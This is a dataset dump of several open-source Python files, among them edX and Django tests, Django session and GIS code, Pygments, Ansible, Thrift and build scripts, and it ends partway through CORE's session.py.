repo_name
stringlengths 5
100
| path
stringlengths 4
375
| copies
stringclasses 991
values | size
stringlengths 4
7
| content
stringlengths 666
1M
| license
stringclasses 15
values |
---|---|---|---|---|---|
mitocw/edx-platform | common/lib/xmodule/xmodule/tests/test_library_root.py | 4 | 3363 | # -*- coding: utf-8 -*-
"""
Basic unit tests for LibraryRoot
"""
from mock import patch
from six.moves import range
from web_fragments.fragment import Fragment
from xblock.runtime import Runtime as VanillaRuntime
from xmodule.modulestore.tests.factories import ItemFactory, LibraryFactory
from xmodule.modulestore.tests.utils import MixedSplitTestCase
from xmodule.x_module import AUTHOR_VIEW
dummy_render = lambda block, _: Fragment(block.data) # pylint: disable=invalid-name
@patch(
'xmodule.modulestore.split_mongo.caching_descriptor_system.CachingDescriptorSystem.render', VanillaRuntime.render
)
@patch('xmodule.html_module.HtmlBlock.author_view', dummy_render, create=True)
@patch('xmodule.html_module.HtmlBlock.has_author_view', True, create=True)
@patch('xmodule.x_module.DescriptorSystem.applicable_aside_types', lambda self, block: [])
class TestLibraryRoot(MixedSplitTestCase):
"""
Basic unit tests for LibraryRoot (library_root_xblock.py)
"""
def test_library_author_view(self):
"""
Test that LibraryRoot.author_view can run and includes content from its
children.
We have to patch the runtime (module system) in order to be able to
render blocks in our test environment.
"""
message = u"Hello world"
library = LibraryFactory.create(modulestore=self.store)
# Add one HTML block to the library:
ItemFactory.create(
category="html",
parent_location=library.location,
user_id=self.user_id,
publish_item=False,
modulestore=self.store,
data=message
)
library = self.store.get_library(library.location.library_key)
context = {'reorderable_items': set(), }
# Patch the HTML block to always render "Hello world"
result = library.render(AUTHOR_VIEW, context)
self.assertIn(message, result.content)
def test_library_author_view_with_paging(self):
"""
Test that LibraryRoot.author_view can apply paging
We have to patch the runtime (module system) in order to be able to
render blocks in our test environment.
"""
library = LibraryFactory.create(modulestore=self.store)
# Add five HTML blocks to the library:
blocks = [
ItemFactory.create(
category="html",
parent_location=library.location,
user_id=self.user_id,
publish_item=False,
modulestore=self.store,
data="HtmlBlock" + str(i)
)
for i in range(5)
]
library = self.store.get_library(library.location.library_key)
def render_and_check_contents(page, page_size):
""" Renders block and asserts on returned content """
context = {'reorderable_items': set(), 'paging': {'page_number': page, 'page_size': page_size}}
expected_blocks = blocks[page_size * page:page_size * (page + 1)]
result = library.render(AUTHOR_VIEW, context)
for expected_block in expected_blocks:
self.assertIn(expected_block.data, result.content)
render_and_check_contents(0, 3)
render_and_check_contents(1, 3)
render_and_check_contents(0, 2)
render_and_check_contents(1, 2)
| agpl-3.0 |
jinxiaoye1987/RyzomCore | nel/tools/build_gamedata/processes/zone_light/1_export.py | 3 | 1955 | #!/usr/bin/python
#
# \file 1_export.py
# \brief Export zone_light
# \date 2009-03-11-13-45-GMT
# \author Jan Boon (Kaetemi)
# Python port of game data build pipeline.
# Export zone_light
#
# NeL - MMORPG Framework <http://dev.ryzom.com/projects/nel/>
# Copyright (C) 2010 Winch Gate Property Limited
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
import time, sys, os, shutil, subprocess, distutils.dir_util
sys.path.append("../../configuration")
if os.path.isfile("log.log"):
os.remove("log.log")
log = open("log.log", "w")
from scripts import *
from buildsite import *
from process import *
from tools import *
from directories import *
printLog(log, "")
printLog(log, "-------")
printLog(log, "--- Export zone_light")
printLog(log, "-------")
printLog(log, time.strftime("%Y-%m-%d %H:%MGMT", time.gmtime(time.time())))
printLog(log, "")
# Find tools
#TgaToDds = findTool(log, ToolDirectories, TgaToDdsTool, ToolSuffix)
printLog(log, "")
# Export zone_light water maps
printLog(log, ">>> Export zone_light water maps <<<")
srcDir = ExportBuildDirectory + "/" + ZoneLightWaterShapesLightedExportDirectory
mkPath(log, srcDir)
for dir in WaterMapSourceDirectories:
destDir = DatabaseDirectory + "/" + dir
mkPath(log, destDir)
copyFilesExtNoTreeIfNeeded(log, srcDir, destDir, ".tga")
printLog(log, "")
log.close()
# end of file
| agpl-3.0 |
mikica1986vee/Godot_android_tegra_fallback | platform/haiku/detect.py | 13 | 1652 | import os
import sys
def is_active():
return True
def get_name():
return "Haiku"
def can_build():
if (os.name != "posix"):
return False
if (sys.platform == "darwin"):
return False
return True
def get_opts():
return [
('debug_release', 'Add debug symbols to release version','no')
]
def get_flags():
return [
('builtin_zlib', 'no')
]
def configure(env):
is64 = sys.maxsize > 2**32
if (env["bits"]=="default"):
if (is64):
env["bits"]="64"
else:
env["bits"]="32"
env.Append(CPPPATH = ['#platform/haiku'])
env["CC"] = "gcc"
env["CXX"] = "g++"
if (env["target"]=="release"):
if (env["debug_release"]=="yes"):
env.Append(CCFLAGS=['-g2'])
else:
env.Append(CCFLAGS=['-O3','-ffast-math'])
elif (env["target"]=="release_debug"):
env.Append(CCFLAGS=['-O2','-ffast-math','-DDEBUG_ENABLED'])
elif (env["target"]=="debug"):
env.Append(CCFLAGS=['-g2', '-Wall','-DDEBUG_ENABLED','-DDEBUG_MEMORY_ENABLED'])
#env.Append(CCFLAGS=['-DFREETYPE_ENABLED'])
env.Append(CPPFLAGS = ['-DGLEW_ENABLED', '-DOPENGL_ENABLED', '-DMEDIA_KIT_ENABLED'])
env.Append(CPPFLAGS = ['-DUNIX_ENABLED', '-DGLES2_ENABLED', '-DGLES_OVER_GL'])
env.Append(LIBS = ['be', 'game', 'media', 'network', 'bnetapi', 'z', 'GL', 'GLEW'])
import methods
env.Append(BUILDERS = {'GLSL120' : env.Builder(action = methods.build_legacygl_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
env.Append(BUILDERS = {'GLSL' : env.Builder(action = methods.build_glsl_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
env.Append(BUILDERS = {'GLSL120GLES' : env.Builder(action = methods.build_gles2_headers, suffix = 'glsl.h',src_suffix = '.glsl')})
| mit |
emineKoc/WiseWit | wisewit_front_end/node_modules/pygmentize-bundled/vendor/pygments/build-2.7/pygments/scanner.py | 135 | 3114 | # -*- coding: utf-8 -*-
"""
pygments.scanner
~~~~~~~~~~~~~~~~
This library implements a regex based scanner. Some languages
like Pascal are easy to parse but have some keywords that
depend on the context. Because of this it's impossible to lex
that just by using a regular expression lexer like the
`RegexLexer`.
Have a look at the `DelphiLexer` to get an idea of how to use
this scanner.
:copyright: Copyright 2006-2014 by the Pygments team, see AUTHORS.
:license: BSD, see LICENSE for details.
"""
import re
class EndOfText(RuntimeError):
"""
Raise if end of text is reached and the user
tried to call a match function.
"""
class Scanner(object):
"""
Simple scanner
All method patterns are regular expression strings (not
compiled expressions!)
"""
def __init__(self, text, flags=0):
"""
:param text: The text which should be scanned
:param flags: default regular expression flags
"""
self.data = text
self.data_length = len(text)
self.start_pos = 0
self.pos = 0
self.flags = flags
self.last = None
self.match = None
self._re_cache = {}
def eos(self):
"""`True` if the scanner reached the end of text."""
return self.pos >= self.data_length
eos = property(eos, eos.__doc__)
def check(self, pattern):
"""
Apply `pattern` on the current position and return
the match object. (Doesn't touch pos). Use this for
lookahead.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
return self._re_cache[pattern].match(self.data, self.pos)
def test(self, pattern):
"""Apply a pattern on the current position and check
if it patches. Doesn't touch pos."""
return self.check(pattern) is not None
def scan(self, pattern):
"""
Scan the text for the given pattern and update pos/match
and related fields. The return value is a boolen that
indicates if the pattern matched. The matched value is
stored on the instance as ``match``, the last value is
stored as ``last``. ``start_pos`` is the position of the
pointer before the pattern was matched, ``pos`` is the
end position.
"""
if self.eos:
raise EndOfText()
if pattern not in self._re_cache:
self._re_cache[pattern] = re.compile(pattern, self.flags)
self.last = self.match
m = self._re_cache[pattern].match(self.data, self.pos)
if m is None:
return False
self.start_pos = m.start()
self.pos = m.end()
self.match = m.group()
return True
def get_char(self):
"""Scan exactly one char."""
self.scan('.')
def __repr__(self):
return '<%s %d/%d>' % (
self.__class__.__name__,
self.pos,
self.data_length
)
| gpl-3.0 |
Lujeni/ansible | lib/ansible/modules/cloud/vultr/_vultr_plan_facts.py | 21 | 3981 | #!/usr/bin/python
# -*- coding: utf-8 -*-
#
# (c) 2018, Yanis Guenane <[email protected]>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import (absolute_import, division, print_function)
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['deprecated'],
'supported_by': 'community'}
DOCUMENTATION = r'''
---
module: vultr_plan_facts
deprecated:
removed_in: '2.13'
why: Deprecated in favour of C(_info) module.
alternative: Use M(vultr_plan_info) instead.
short_description: Gather facts about the Vultr plans available.
description:
- Gather facts about plans available to boot servers.
version_added: "2.7"
author: "Yanis Guenane (@Spredzy)"
extends_documentation_fragment: vultr
'''
EXAMPLES = r'''
- name: Gather Vultr plans facts
local_action:
module: vultr_plan_facts
- name: Print the gathered facts
debug:
var: ansible_facts.vultr_plan_facts
'''
RETURN = r'''
---
vultr_api:
description: Response from Vultr API with a few additions/modification
returned: success
type: complex
contains:
api_account:
description: Account used in the ini file to select the key
returned: success
type: str
sample: default
api_timeout:
description: Timeout used for the API requests
returned: success
type: int
sample: 60
api_retries:
description: Amount of max retries for the API requests
returned: success
type: int
sample: 5
api_retry_max_delay:
description: Exponential backoff delay in seconds between retries up to this max delay value.
returned: success
type: int
sample: 12
version_added: '2.9'
api_endpoint:
description: Endpoint used for the API requests
returned: success
type: str
sample: "https://api.vultr.com"
vultr_plan_facts:
description: Response from Vultr API
returned: success
type: complex
contains:
plan:
description: List of the plans available.
returned: success
type: list
sample: [{
"available_locations": [
1
],
"bandwidth": 40.0,
"bandwidth_gb": 40960,
"disk": 110,
"id": 118,
"name": "32768 MB RAM,110 GB SSD,40.00 TB BW",
"plan_type": "DEDICATED",
"price_per_month": 240.0,
"ram": 32768,
"vcpu_count": 8,
"windows": false
}]
'''
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vultr import (
Vultr,
vultr_argument_spec,
)
class AnsibleVultrPlanFacts(Vultr):
def __init__(self, module):
super(AnsibleVultrPlanFacts, self).__init__(module, "vultr_plan_facts")
self.returns = {
"VPSPLANID": dict(key='id', convert_to='int'),
"available_locations": dict(),
"bandwidth": dict(convert_to='float'),
"bandwidth_gb": dict(convert_to='int'),
"disk": dict(convert_to='int'),
"name": dict(),
"plan_type": dict(),
"price_per_month": dict(convert_to='float'),
"ram": dict(convert_to='int'),
"vcpu_count": dict(convert_to='int'),
"windows": dict(convert_to='bool')
}
def get_plans(self):
return self.api_query(path="/v1/plans/list")
def parse_plans_list(plans_list):
return [plan for id, plan in plans_list.items()]
def main():
argument_spec = vultr_argument_spec()
module = AnsibleModule(
argument_spec=argument_spec,
supports_check_mode=True,
)
plan_facts = AnsibleVultrPlanFacts(module)
result = plan_facts.get_result(parse_plans_list(plan_facts.get_plans()))
ansible_facts = {
'vultr_plan_facts': result['vultr_plan_facts']
}
module.exit_json(ansible_facts=ansible_facts, **result)
if __name__ == '__main__':
main()
| gpl-3.0 |
runekaagaard/django-contrib-locking | tests/view_tests/tests/test_csrf.py | 47 | 2663 | from django.test import TestCase, override_settings, Client
from django.utils.translation import override
@override_settings(ROOT_URLCONF="view_tests.urls")
class CsrfViewTests(TestCase):
def setUp(self):
super(CsrfViewTests, self).setUp()
self.client = Client(enforce_csrf_checks=True)
@override_settings(
USE_I18N=True,
MIDDLEWARE_CLASSES=(
'django.middleware.locale.LocaleMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
),
)
def test_translation(self):
"""
Test that an invalid request is rejected with a localized error message.
"""
response = self.client.post('/')
self.assertContains(response, "Forbidden", status_code=403)
self.assertContains(response,
"CSRF verification failed. Request aborted.",
status_code=403)
with self.settings(LANGUAGE_CODE='nl'), override('en-us'):
response = self.client.post('/')
self.assertContains(response, "Verboden", status_code=403)
self.assertContains(response,
"CSRF-verificatie mislukt. Verzoek afgebroken.",
status_code=403)
@override_settings(
SECURE_PROXY_SSL_HEADER=('HTTP_X_FORWARDED_PROTO', 'https')
)
def test_no_referer(self):
"""
Referer header is strictly checked for POST over HTTPS. Trigger the
exception by sending an incorrect referer.
"""
response = self.client.post('/', HTTP_X_FORWARDED_PROTO='https')
self.assertContains(response,
"You are seeing this message because this HTTPS "
"site requires a 'Referer header' to be "
"sent by your Web browser, but none was sent.",
status_code=403)
def test_no_cookies(self):
"""
The CSRF cookie is checked for POST. Failure to send this cookie should
provide a nice error message.
"""
response = self.client.post('/')
self.assertContains(response,
"You are seeing this message because this site "
"requires a CSRF cookie when submitting forms. "
"This cookie is required for security reasons, to "
"ensure that your browser is not being hijacked "
"by third parties.",
status_code=403)
| bsd-3-clause |
st135yle/django-site | dbenv/lib/python3.4/site-packages/django/contrib/sessions/backends/cache.py | 117 | 2766 | from django.conf import settings
from django.contrib.sessions.backends.base import (
CreateError, SessionBase, UpdateError,
)
from django.core.cache import caches
from django.utils.six.moves import range
KEY_PREFIX = "django.contrib.sessions.cache"
class SessionStore(SessionBase):
"""
A cache-based session store.
"""
cache_key_prefix = KEY_PREFIX
def __init__(self, session_key=None):
self._cache = caches[settings.SESSION_CACHE_ALIAS]
super(SessionStore, self).__init__(session_key)
@property
def cache_key(self):
return self.cache_key_prefix + self._get_or_create_session_key()
def load(self):
try:
session_data = self._cache.get(self.cache_key)
except Exception:
# Some backends (e.g. memcache) raise an exception on invalid
# cache keys. If this happens, reset the session. See #17810.
session_data = None
if session_data is not None:
return session_data
self._session_key = None
return {}
def create(self):
# Because a cache can fail silently (e.g. memcache), we don't know if
# we are failing to create a new session because of a key collision or
# because the cache is missing. So we try for a (large) number of times
# and then raise an exception. That's the risk you shoulder if using
# cache backing.
for i in range(10000):
self._session_key = self._get_new_session_key()
try:
self.save(must_create=True)
except CreateError:
continue
self.modified = True
return
raise RuntimeError(
"Unable to create a new session key. "
"It is likely that the cache is unavailable.")
def save(self, must_create=False):
if self.session_key is None:
return self.create()
if must_create:
func = self._cache.add
elif self._cache.get(self.cache_key) is not None:
func = self._cache.set
else:
raise UpdateError
result = func(self.cache_key,
self._get_session(no_load=must_create),
self.get_expiry_age())
if must_create and not result:
raise CreateError
def exists(self, session_key):
return session_key and (self.cache_key_prefix + session_key) in self._cache
def delete(self, session_key=None):
if session_key is None:
if self.session_key is None:
return
session_key = self.session_key
self._cache.delete(self.cache_key_prefix + session_key)
@classmethod
def clear_expired(cls):
pass
| mit |
damonkohler/sl4a | python/src/Lib/plat-irix5/FILE.py | 66 | 4038 | # Generated by h2py from /usr/include/sys/file.h
from warnings import warnpy3k
warnpy3k("the FILE module has been removed in Python 3.0", stacklevel=2)
del warnpy3k
# Included from sys/types.h
# Included from sgidefs.h
_MIPS_ISA_MIPS1 = 1
_MIPS_ISA_MIPS2 = 2
_MIPS_ISA_MIPS3 = 3
_MIPS_ISA_MIPS4 = 4
_MIPS_SIM_ABI32 = 1
_MIPS_SIM_NABI32 = 2
_MIPS_SIM_ABI64 = 3
P_MYID = (-1)
P_MYHOSTID = (-1)
# Included from sys/bsd_types.h
# Included from sys/mkdev.h
ONBITSMAJOR = 7
ONBITSMINOR = 8
OMAXMAJ = 0x7f
OMAXMIN = 0xff
NBITSMAJOR = 14
NBITSMINOR = 18
MAXMAJ = 0x1ff
MAXMIN = 0x3ffff
OLDDEV = 0
NEWDEV = 1
MKDEV_VER = NEWDEV
def major(dev): return __major(MKDEV_VER, dev)
def minor(dev): return __minor(MKDEV_VER, dev)
# Included from sys/select.h
FD_SETSIZE = 1024
NBBY = 8
# Included from sys/sema.h
HP_NOPOLICY = 0
HP_ADDOFF = 1
HP_MULOFF = 2
SEMA_NAMSZ = 8
SEMA_NOHIST = 0x1
SEMA_LIFO = 0x2
SEMA_MUTEX = 0x4
SEMA_METER = 0x8
SEMAOP_PSEMA = 1
SEMAOP_VSEMA = 2
SEMAOP_CPSEMA = 3
SEMAOP_CVSEMA = 4
SEMAOP_WSEMA = 5
SEMAOP_UNSEMA = 6
SEMAOP_INIT = 7
SEMAOP_FREE = 8
SSOP_PHIT = 1
SSOP_PSLP = 2
SSOP_PWAKE = 6
SSOP_PRESIG = 7
SSOP_POSTSIG = 8
SSOP_VNOWAKE = 3
SSOP_VWAKE = 4
SSOP_CPHIT = 1
SSOP_CPMISS = 5
SSOP_CVNOWAKE = 3
SSOP_CVWAKE = 4
SSOP_WMISS = 5
SSOP_WWAKE = 4
SSOP_RMV = 9
TZERO = 10
SEMA_NOP = 0
SEMA_WAKE = 1
SEMA_VSEMA = 2
SEMA_SPINOP = 3
MR_ACCESS = 0x1
MR_UPDATE = 0x2
def cv_signal(cv): return cvsema(cv);
def cv_destroy(cv): return freesema(cv)
def mutex_enter(m): return psema(m, PZERO | PNOSTOP)
def mutex_exit(m): return vsema(m)
def mutex_destroy(m): return freesema(m)
def MUTEX_HELD(m): return (ownsema(m))
def MUTEX_HELD(m): return (1)
RW_READER = MR_ACCESS
RW_WRITER = MR_UPDATE
def rw_exit(r): return mrunlock(r)
def rw_tryupgrade(r): return cmrpromote(r)
def rw_downgrade(r): return mrdemote(r)
def rw_destroy(r): return mrfree(r)
def RW_WRITE_HELD(r): return ismrlocked(r, MR_UPDATE)
def RW_READ_HELD(r): return ismrlocked(r, MR_ACCESS)
# Included from sys/splock.h
SPLOCKNAMSIZ = 8
SPLOCK_NONE = 0
SPLOCK_SOFT = 1
SPLOCK_HARD = 2
OWNER_NONE = -1
MAP_LOCKID = 0
SPLOCK_MAX = (96*1024)
SPLOCK_MAX = 32768
MIN_POOL_SIZE = 256
MAX_POOL_SIZE = 16384
DEF_SEMA_POOL = 8192
DEF_VNODE_POOL = 1024
DEF_FILE_POOL = 1024
def ownlock(x): return 1
def splock(x): return 1
def io_splock(x): return 1
def apvsema(x): return vsema(x)
def apcpsema(x): return cpsema(x)
def apcvsema(x): return cvsema(x)
def mp_mrunlock(a): return mrunlock(a)
def apvsema(x): return 0
def apcpsema(x): return 1
def apcvsema(x): return 0
def mp_mrunlock(a): return 0
# Included from sys/fcntl.h
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
O_RDONLY = 0
O_WRONLY = 1
O_RDWR = 2
O_NDELAY = 0x04
O_APPEND = 0x08
O_SYNC = 0x10
O_NONBLOCK = 0x80
O_DIRECT = 0x8000
O_CREAT = 0x100
O_TRUNC = 0x200
O_EXCL = 0x400
O_NOCTTY = 0x800
F_DUPFD = 0
F_GETFD = 1
F_SETFD = 2
F_GETFL = 3
F_SETFL = 4
F_GETLK = 14
F_SETLK = 6
F_SETLKW = 7
F_CHKFL = 8
F_ALLOCSP = 10
F_FREESP = 11
F_SETBSDLK = 12
F_SETBSDLKW = 13
F_DIOINFO = 30
F_FSGETXATTR = 31
F_FSSETXATTR = 32
F_GETLK64 = 33
F_SETLK64 = 34
F_SETLKW64 = 35
F_ALLOCSP64 = 36
F_FREESP64 = 37
F_GETBMAP = 38
F_FSSETDM = 39
F_RSETLK = 20
F_RGETLK = 21
F_RSETLKW = 22
F_GETOWN = 23
F_SETOWN = 24
F_O_GETLK = 5
F_O_GETOWN = 10
F_O_SETOWN = 11
F_RDLCK = 01
F_WRLCK = 02
F_UNLCK = 03
O_ACCMODE = 3
FD_CLOEXEC = 1
FD_NODUP_FORK = 4
FMASK = 0x90FF
FOPEN = 0xFFFFFFFF
FREAD = 0x01
FWRITE = 0x02
FNDELAY = 0x04
FAPPEND = 0x08
FSYNC = 0x10
FNONBLOCK = 0x80
FASYNC = 0x1000
FNONBLK = FNONBLOCK
FDIRECT = 0x8000
FCREAT = 0x0100
FTRUNC = 0x0200
FEXCL = 0x0400
FNOCTTY = 0x0800
IRIX4_FASYNC = 0x40
FMARK = 0x4000
FDEFER = 0x2000
FINPROGRESS = 0x0400
FINVIS = 0x0100
FNMFS = 0x2000
FCLOSEXEC = 001
FDSHD = 0x0001
FDNOMARK = 0x0002
FDIGNPROGRESS = 0x0004
LOCK_SH = 1
LOCK_EX = 2
LOCK_NB = 4
LOCK_UN = 8
F_OK = 0
X_OK = 1
W_OK = 2
R_OK = 4
L_SET = 0
L_INCR = 1
L_XTND = 2
| apache-2.0 |
zonesan/shadowsocks-android | gfwlist/gen.py | 304 | 1535 | #!/usr/bin/python
# -*- encoding: utf8 -*-
import itertools
import math
import sys
import IPy
def main():
china_list_set = IPy.IPSet()
for line in sys.stdin:
line_params = line.split("|")
if len(line_params) < 5 or line_params[2] != "ipv4" or line_params[1] != "CN":
continue
ip_addr = line_params[3]
ip_length = float(line_params[4])
ip_mask = 32 - int(math.ceil(math.log(ip_length, 2)))
china_list_set.add(IPy.IP("%s/%d" % (ip_addr, ip_mask)))
# 添加内网地址
internal_list = IPy.IPSet(map(IPy.IP, [
"0.0.0.0/8",
"10.0.0.0/8",
"100.64.0.0/10",
"112.124.47.0/24",
"114.114.114.0/24",
"127.0.0.0/8",
"169.254.0.0/16",
"172.16.0.0/12",
"192.0.0.0/29",
"192.0.2.0/24",
"192.88.99.0/24",
"192.168.0.0/16",
"198.18.0.0/15",
"198.51.100.0/24",
"203.0.113.0/24",
"224.0.0.0/4",
"240.0.0.0/4",
]))
china_list_set += internal_list
all = china_list_set
# 取反
# all = IPy.IPSet([IPy.IP("0.0.0.0/0")])
# 剔除所有孤立的C段
# for ip in china_list_set:
# all.discard(ip)
# filter = itertools.ifilter(lambda x: len(x) <= 65536, all)
# for ip in filter:
# all.discard(ip)
# all.add(IPy.IP(ip.strNormal(0)).make_net('255.255.0.0'))
# 输出结果
for ip in all:
print '<item>' + str(ip) + '</item>'
if __name__ == "__main__":
main()
| gpl-3.0 |
jounex/hue | desktop/core/ext-py/thrift-0.9.1/src/transport/THttpClient.py | 157 | 4221 | #
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
#
import httplib
import os
import socket
import sys
import urllib
import urlparse
import warnings
from cStringIO import StringIO
from TTransport import *
class THttpClient(TTransportBase):
"""Http implementation of TTransport base."""
def __init__(self, uri_or_host, port=None, path=None):
"""THttpClient supports two different types constructor parameters.
THttpClient(host, port, path) - deprecated
THttpClient(uri)
Only the second supports https.
"""
if port is not None:
warnings.warn(
"Please use the THttpClient('http://host:port/path') syntax",
DeprecationWarning,
stacklevel=2)
self.host = uri_or_host
self.port = port
assert path
self.path = path
self.scheme = 'http'
else:
parsed = urlparse.urlparse(uri_or_host)
self.scheme = parsed.scheme
assert self.scheme in ('http', 'https')
if self.scheme == 'http':
self.port = parsed.port or httplib.HTTP_PORT
elif self.scheme == 'https':
self.port = parsed.port or httplib.HTTPS_PORT
self.host = parsed.hostname
self.path = parsed.path
if parsed.query:
self.path += '?%s' % parsed.query
self.__wbuf = StringIO()
self.__http = None
self.__timeout = None
self.__custom_headers = None
def open(self):
if self.scheme == 'http':
self.__http = httplib.HTTP(self.host, self.port)
else:
self.__http = httplib.HTTPS(self.host, self.port)
def close(self):
self.__http.close()
self.__http = None
def isOpen(self):
return self.__http is not None
def setTimeout(self, ms):
if not hasattr(socket, 'getdefaulttimeout'):
raise NotImplementedError
if ms is None:
self.__timeout = None
else:
self.__timeout = ms / 1000.0
def setCustomHeaders(self, headers):
self.__custom_headers = headers
def read(self, sz):
return self.__http.file.read(sz)
def write(self, buf):
self.__wbuf.write(buf)
def __withTimeout(f):
def _f(*args, **kwargs):
orig_timeout = socket.getdefaulttimeout()
socket.setdefaulttimeout(args[0].__timeout)
result = f(*args, **kwargs)
socket.setdefaulttimeout(orig_timeout)
return result
return _f
def flush(self):
if self.isOpen():
self.close()
self.open()
# Pull data out of buffer
data = self.__wbuf.getvalue()
self.__wbuf = StringIO()
# HTTP request
self.__http.putrequest('POST', self.path)
# Write headers
self.__http.putheader('Host', self.host)
self.__http.putheader('Content-Type', 'application/x-thrift')
self.__http.putheader('Content-Length', str(len(data)))
if not self.__custom_headers or 'User-Agent' not in self.__custom_headers:
user_agent = 'Python/THttpClient'
script = os.path.basename(sys.argv[0])
if script:
user_agent = '%s (%s)' % (user_agent, urllib.quote(script))
self.__http.putheader('User-Agent', user_agent)
if self.__custom_headers:
for key, val in self.__custom_headers.iteritems():
self.__http.putheader(key, val)
self.__http.endheaders()
# Write payload
self.__http.send(data)
# Get reply to flush the request
self.code, self.message, self.headers = self.__http.getreply()
# Decorate if we know how to timeout
if hasattr(socket, 'getdefaulttimeout'):
flush = __withTimeout(flush)
| apache-2.0 |
sivareddyg/UDepLambda | scripts/graphquestions/split_data.py | 1 | 1167 | import sys
import json
import random
if len(sys.argv) > 2:
dev_split_size = int(sys.argv[2])
else:
dev_split_size = 30
training_file = open(sys.argv[1] + ".%d" %(100 - dev_split_size), "w")
dev_file = open(sys.argv[1] + ".%d" %(dev_split_size), "w")
sys.stderr.write("Creating training and dev splits\n");
sparql_to_sent = {}
for line in open(sys.argv[1]):
sent = json.loads(line)
query = sent['sparql_query']
if query not in sparql_to_sent:
sparql_to_sent[query] = []
sparql_to_sent[query].append(line)
data = sparql_to_sent.items()
random.seed(1)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
random.shuffle(data)
training_data_size = (100 - dev_split_size) * len(data) / 100
training_data = []
for query in data[:training_data_size]:
training_data += query[1]
random.shuffle(training_data)
dev_data = []
for query in data[training_data_size:]:
dev_data += query[1]
random.shuffle(dev_data)
for sent in training_data:
training_file.write(sent)
training_file.close()
for sent in dev_data:
dev_file.write(sent)
dev_file.close()
| apache-2.0 |
luiscarlosgph/nas | env/lib/python2.7/site-packages/django/contrib/gis/db/models/lookups.py | 48 | 1423 | from django.db.models.lookups import Lookup
from django.db.models.sql.expressions import SQLEvaluator
class GISLookup(Lookup):
def as_sql(self, qn, connection):
from django.contrib.gis.db.models.sql import GeoWhereNode
# We use the same approach as was used by GeoWhereNode. It would
# be a good idea to upgrade GIS to use similar code that is used
# for other lookups.
if isinstance(self.rhs, SQLEvaluator):
# Make sure the F Expression destination field exists, and
# set an `srid` attribute with the same as that of the
# destination.
geo_fld = GeoWhereNode._check_geo_field(self.rhs.opts, self.rhs.expression.name)
if not geo_fld:
raise ValueError('No geographic field found in expression.')
self.rhs.srid = geo_fld.srid
db_type = self.lhs.output_field.db_type(connection=connection)
params = self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, self.rhs, connection=connection)
lhs_sql, lhs_params = self.process_lhs(qn, connection)
# lhs_params not currently supported.
assert not lhs_params
data = (lhs_sql, db_type)
spatial_sql, spatial_params = connection.ops.spatial_lookup_sql(
data, self.lookup_name, self.rhs, self.lhs.output_field, qn)
return spatial_sql, spatial_params + params
| mit |
Benocs/core | src/daemon/core/session.py | 1 | 45796 | #
# CORE
# Copyright (c)2010-2013 the Boeing Company.
# See the LICENSE file included in this distribution.
#
# authors: Tom Goff <[email protected]>
# Jeff Ahrenholz <[email protected]>
#
# Copyright (c) 2014 Benocs GmbH
#
# author: Robert Wuttke <[email protected]>
#
# See the LICENSE file included in this distribution.
#
'''
session.py: defines the Session class used by the core-daemon daemon program
that manages a CORE session.
'''
import os, sys, tempfile, shutil, shlex, atexit, gc, pwd
import threading, time, random
from core.api import coreapi
if os.uname()[0] == "Linux":
from core.netns import nodes
from core.netns.vnet import GreTapBridge
elif os.uname()[0] == "FreeBSD":
from core.bsd import nodes
from core.emane import emane
from core.misc.utils import check_call, mutedetach, readfileintodict, \
filemunge, filedemunge
from core.conf import ConfigurableManager, Configurable
from core.location import CoreLocation
from core.service import CoreServices
from core.broker import CoreBroker
from core.mobility import MobilityManager
from core.netidsubnetmap import NetIDSubnetMapManager
from core.sdt import Sdt
from core.misc.ipaddr import MacAddr
from core.misc.event import EventLoop
from core.constants import *
from core.xen import xenconfig
class Session(object):
# sessions that get automatically shutdown when the process
# terminates normally
__sessions = set()
verbose = False
''' CORE session manager.
'''
def __init__(self, sessionid = None, cfg = {}, server = None,
persistent = False, mkdir = True):
if sessionid is None:
# try to keep this short since it's used to construct
# network interface names
pid = os.getpid()
sessionid = ((pid >> 16) ^
(pid & ((1 << 16) - 1)))
sessionid ^= ((id(self) >> 16) ^ (id(self) & ((1 << 16) - 1)))
sessionid &= 0xffff
self.sessionid = sessionid
self.sessiondir = os.path.join(tempfile.gettempdir(),
"pycore.%s" % self.sessionid)
if mkdir:
os.mkdir(self.sessiondir)
self.name = None
self.filename = None
self.thumbnail = None
self.user = None
self.node_count = None
self._time = time.time()
self.evq = EventLoop()
# dict of objects: all nodes and nets
self._objs = {}
self._objslock = threading.Lock()
# dict of configurable objects
self._confobjs = {}
self._confobjslock = threading.Lock()
self._handlers = set()
self._handlerslock = threading.Lock()
self._hooks = {}
